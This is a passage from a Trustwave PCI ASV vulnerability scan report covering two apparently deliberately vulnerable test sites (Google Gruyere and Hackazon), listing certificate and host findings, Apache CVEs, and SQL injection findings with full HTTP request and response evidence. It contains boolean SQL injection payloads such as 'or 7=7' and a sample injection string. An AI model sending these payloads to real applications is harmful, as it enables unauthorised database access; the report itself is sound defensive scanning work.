Review your certificate configurations to assure that wildcard
certificates are suitable for your application.

10 Wildcard SSL Certificate 0.0 Info Pass Port: tcp/443


Detected
An SSL certificate with a wildcarded common name (CN) record (e.g.,
*.mydomain.com) was detected on this service.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 821 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Certificate Chain Depth: 0
Wildcard Subject Name: *.withgoogle.com

Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.

11 Service Detected 0.0 Info Pass Port: tcp/80

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Evidence:
application_protocol: http
ip_address: 172.217.0.20
port_number: 80
transport_protocol: tcp

12 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: google-gruyere.appspot.com
ip_address: 172.217.0.20

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 822 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

13 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: google-gruyere.appspot.com
ip_address: 2607:F8B0:4009:813::2014

14 Wildcard SSL Certificate 0.0 Info Pass Port: tcp/443


Detected
An SSL certificate with a wildcarded common name (CN) record (e.g.,
*.mydomain.com) was detected on this service.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.withyoutube.com

Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.

15 Host Detected 0.0 Info Pass This host responded to network probes.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 823 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: google-gruyere.appspot.com
ip_address: 2607:F8B0:4009:813::2014

16 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: google-gruyere.appspot.com
ip_address: 172.217.0.20

17 Enumerated Hostnames 0.0 Info Pass This list contains all hostnames discovered during the scan that are
believed to belong to this host.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
Hostname: app.google, Source: SSL Certificate Subject subjectAltName
DNS
Hostname: appspot.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: run.app, Source: SSL Certificate Subject subjectAltName
DNS
Hostname: thinkwithgoogle.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: withgoogle.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: withyoutube.com, Source: SSL Certificate Subject
subjectAltName DNS

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 824 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
No action is required.

18 SSL-TLS Certificate 0.0 Info Pass Port: tcp/443


Information
Information extracted from a certificate discovered on a TLS or SSL
wrapped service.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
Verified: true
Today: 2019-08-05 21:55:42 -0500
Start date: 2019-07-29 18:32:34 UTC
End date: 2019-10-21 18:23:00 UTC
Expired: false
Fingerprint: F5:29:C8:4C:78:6F:F6:43:49:91:22:B7:02:C4:08:E2
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Common name: *.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Signature Algorithm: sha256WithRSAEncryption
Version: 2

19 Service Detected 0.0 Info Pass Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 825 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

google-gruyere.appspot.com (MV PCI6)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
application_protocol: https
ip_address: 172.217.0.20
port_number: 443
ssl_enabled: true
transport_protocol: tcp

20 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 172.217.0.20
os_name: embedded

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 SQL Injection Vulnerability 7.5 High Fail URL: https://hackazon.webscantest.com/wishlist/new


Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 826 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
A SQL injection vulnerability (SQLi) was identified in this web
application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://hackazon.webscantest.com/wishlist/new - type
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST https://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://hackazon.webscantest.com/wishlist
Origin: https://hackazon.webscantest.com

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 827 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=&name=New+Wish+List&type=or+7%3D7&_csrf_wishlist_add=Wz
up7LwI01S7dirlrNYtCePuKQ3QdAO9
True Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:15:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8

{"success":1,"id":"3188"}
False Request: POST https://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://hackazon.webscantest.com/wishlist
Origin: https://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=&name=New+Wish+List&type=or+7%3D6&_csrf_wishlist_add=Wz
up7LwI01S7dirlrNYtCePuKQ3QdAO9
False Response: HTTP/1.1 200 OK

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 828 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Date: Tue, 06 Aug 2019 04:15:42 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8

{"success":1,"id":"3189"}

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

2 CVE-2017-9788 Apache HTTP Server 7.5 High Fail URL: https://hackazon.webscantest.com/


CVE-2017-7679 Multiple Vulnerabilities Port: tcp/443
CVE-2017-7668 2.2.x Through 2.2.34 and
2.4.x Apache HTTP Server suffers from multiple vulnerabilities in 2.2.x

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 829 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVE-2017-3169 prior to 2.4.26 through 2.2.34 and 2.4.x prior to 2.4.26. These vulnerabilities are listed
CVE-2017-3167 below.

CVE-2017-3167 - A vulnerability exists in the ap_get_basic_auth_pw()


function of Apache HTTP Serverwhere if it used in a third party
extension outside of the authentication phase authentication
requirements can be bypassed.

CVE-2017-3169 - The mod_ssl module in Apache HTTP Server may


dereference a null pointer when ap_hook_process_connection() is called
by third party modules.

CVE-2017-7668 - The ap_find_token() function in Apache HTTP Server is


vulnerable to segmentation faults and other effects from crafted
malicious input.

CVE-2017-7679 - mod_mime can read one byte past its' buffer when
used in a malicious Content-Type response header.

CVE-2017-9788 - The [Proxy-]Authorization headers in Apache HTTP


Server can potentially leak information or experience a segmentation
fault causing a denial of service. This vulnerability exists due to poor
key refresh and assignment practices between sessions.

CVE: CVE-2017-9788, CVE-2017-7679, CVE-2017-7668, CVE-


2017-3169, CVE-2017-3167
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Application: apache:http_server

Reference:
https://httpd.apache.org/security/vulnerabilities_22.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 830 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://httpd.apache.org/security/vulnerabilities_24.html

Evidence:
Match: '2.4.7' is greater than or equal to '2.4.0'
Match: '2.4.7' is less than '2.4.26'

Remediation:
Upgrade to the most recent version of Apache HTTP Server 2.2.34 for
2.2 users or 2.4.26 for 2.4 users.

3 SQL Injection Vulnerability 7.5 High Fail URL: http://hackazon.webscantest.com/wishlist/new


Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 831 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://hackazon.webscantest.com/wishlist/new - type
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=&name=New+Wish+List&type=or+7%3D7&_csrf_wishlist_add=U0z
tnjBA24QQ69yzqfMsDo0iHP4UVVo7
True Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:14:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 832 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
{"success":1,"id":"2580"}
False Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=&name=New+Wish+List&type=or+7%3D6&_csrf_wishlist_add=U0z
tnjBA24QQ69yzqfMsDo0iHP4UVVo7
False Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:14:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8

{"success":1,"id":"2581"}

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 833 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

4 SQL Injection Vulnerability 7.5 High Fail URL: http://hackazon.webscantest.com/wishlist/new


Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 834 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://hackazon.webscantest.com/wishlist/new - id
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=or+7%3D7&name=New+Wish+List&type=private&_csrf_wishlist_a
dd=U0ztnjBA24QQ69yzqfMsDo0iHP4UVVo7

True Response: HTTP/1.1 200 OK


Date: Tue, 06 Aug 2019 04:14:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 835 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
{"success":1,"id":"2464"}
False Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=or+7%3D6&name=New+Wish+List&type=private&_csrf_wishlist_a
dd=U0ztnjBA24QQ69yzqfMsDo0iHP4UVVo7

False Response: HTTP/1.1 200 OK


Date: Tue, 06 Aug 2019 04:14:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8

{"success":1,"id":"2465"}

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 836 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

5 SQL Injection Vulnerability 7.5 High Fail URL: https://hackazon.webscantest.com/product/view?id=or+7%3D


6
Port: tcp/443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 837 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
GET - https://hackazon.webscantest.com/product/view?id=or+7%3D6 -
id
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: GET
https://hackazon.webscantest.com/product/view?id=or+7%3D7
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

True Response: HTTP/1.0 503 Service Unavailable


Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>503 Service Unavailable</h1>


No server is available to handle this request.
</body></html>

False Request: GET


https://hackazon.webscantest.com/product/view?id=or+7%3D6
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 838 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

False Response: HTTP/1.1 404 Not Found


Date: Tue, 06 Aug 2019 04:18:54 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Status: 404 Not Found
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Hackazon &mdash; Error: 404 Invalid product id</title>

<meta name="viewport" content="width=device-width, initial-


scale=1.0">
<meta name="description" content="">
<meta name="author" content="">

<!-- Bootstrap core CSS -->


<link href="/css/bootstrap.css" rel="stylesheet">

<!-- Fonts -->


<!--link rel="stylesheet" type="text/css"
href="//fonts.googleapis.com/css?family=McLaren">
<link href='//fonts.googleapis.com/css?family=Ubuntu:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 839 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
300,400,500,700,300italic,400italic,500italic,700italic' rel='stylesheet'
type='text/css'-->
<link href="/font-awesome/css/font-awesome.min.css"
rel="stylesheet">

<!-- Libraries -->


<link href="/css/ekko-lightbox.css" rel="stylesheet">
<link href="/css/star-rating.min.css" rel="stylesheet">
<link href="/css/nivo-slider.css" rel="stylesheet">
<link href="/css/nivo-themes/bar/bar.css" rel="stylesheet">
<link href="/css/nivo-themes/light/light.css" rel="stylesheet">
<link href="/css/bootstrapValidator.css" rel="stylesheet">
<link href="/css/modern-business.css" rel="stylesheet">
<link href="/css/ladda-themeless.min.css" rel="stylesheet">

<!-- Add custom CSS here -->


<link href="/css/subcategory.css" rel="stylesheet">
<link href="/css/site.css" rel="stylesheet">
<link href="/css/sidebar.css" rel="stylesheet">

<script type="text/javascript">
var App = window.App || {};
App.config =
{"host":"http:\/\/hackazon.webscantest.com","user":{"id":"473","userna
me":"CHSuser","first_name":"John","last_name":"Smith","user_phone":"
4085551234","email":"jsmith20@kelev.biz","created_on":"2019-08-05
20:02:57","photo":null,"photoUrl":null},"baseImgPath":"\/user_pictures\
/","dataType":"xml"};
</script>

<!-- JavaScript -->


<script src="/js/jquery-1.10.2.js"></script>
<script src="/js/json3.min.js"></script>
<script src="/js/jquery.dump.js"></script>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 840 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<script src="/js/jquery-migrate-1.2.1.js"></script>
<script src="/js/bootstrap.js"></script>
<script src="/js/modern-business.js"></script>
<script src="/js/bootstrapValidator.min.js"></script>
<script src="/js/jquery.validate.min.js"></script>
<script src="/js/spin.min.js"></script>
<script src="/js/moment.min.js"></script>
<script src="/js/jquery.modern-blink.js"></script>
<script src="/js/ladda.min.js"></script>
<script src="/js/ladda.jquery.min.js"></script>
<script src="/js/jquery.inputmask.js"></script>
<script src="/js/ekko-lightbox.js"></script>
<script src="/js/jquery.nivo.slider.pack.js"></script>
<script src="/js/respond.min.js"></script>
<script src="/js/star-rating.min.js"></script>
<script src="/js/bootstrap.file-input.js"></script>
<script src="/js/knockout-2.2.1.js"></script>
<script src="/js/knockout.localStorage.js"></script>
<script src="/js/koExternalTemplateEngine_all.min.js"></script>
<script src="/js/amf/services.js"></script>
<script src="/js/swfobject.js"></script>

<script src="/js/tools.js"></script>
<script src="/js/site.js"></script>

<script type="text/javascript">
// For version detection, set to min. required Flash Player version,
or 0 (or 0.0.0), for no version detection.
var swfVersionStr = "11.1.0";
// To use express install, set to playerProductInstall.swf, otherwise
the empty string.
